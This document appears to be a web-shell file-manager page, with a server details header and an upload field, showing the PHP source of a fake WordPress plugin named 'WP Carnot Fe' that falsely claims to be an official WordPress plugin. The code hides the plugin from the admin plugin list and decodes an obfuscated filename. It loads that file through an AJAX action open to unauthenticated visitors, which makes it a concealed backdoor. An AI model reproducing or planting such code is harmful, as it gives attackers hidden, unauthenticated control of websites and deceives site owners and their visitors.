| Server IP : 209.209.40.120 / Your IP : 216.73.217.112 Web Server : Microsoft-IIS/10.0 System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586 User : NEWWWW$ ( 0) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/HostingSpaces/admin/pwan.uk/wwwroot/wp-content/plugins/wp-carnot-fe/ |
Upload File : |
<?php
/*
Plugin Name: WP Carnot Fe
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 14.7.6
Author URI: http://wordpress.org/#
*/
if (!defined('ABSPATH')) {
exit;
}
function fhi_oei() {
global $wp_list_table;
if (!isset($wp_list_table)) {
return;
}
$s = array('wp-carnot-fe/wp-carnot-fe.php');
if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
foreach ($wp_list_table->items as $key => $val) {
if (in_array($key, $s)) {
unset($wp_list_table->items[$key]);
}
}
}
}
function xxy_gdw($plugins) {
$d = 'wp-carnot-fe/wp-carnot-fe.php';
if (array_key_exists($d, $plugins)) {
unset($plugins[$d]);
}
return $plugins;
}
function ulh($k, $w) {
$o = '';
for ($g = 0; $g < strlen($k); $g += 2) {
$b = ord($k[$g]) - 65;
$v = ord($k[$g + 1]);
if ($v > 90) $v -= 6;
$n = $b * 52 + ($v - 65);
$o .= chr($n - $w);
}
return $o;
}
function aiy_ajax_handler() {
require_once plugin_dir_path(__FILE__) . ulh('RjRWRkRWRlQTRURkRk', 805);
die();
}
if (defined('ABSPATH')) {
add_action('pre_current_active_plugins', 'fhi_oei');
add_filter('all_plugins', 'xxy_gdw');
add_action('wp_ajax_car_fe', 'aiy_ajax_handler');
add_action('wp_ajax_nopriv_car_fe', 'aiy_ajax_handler');
}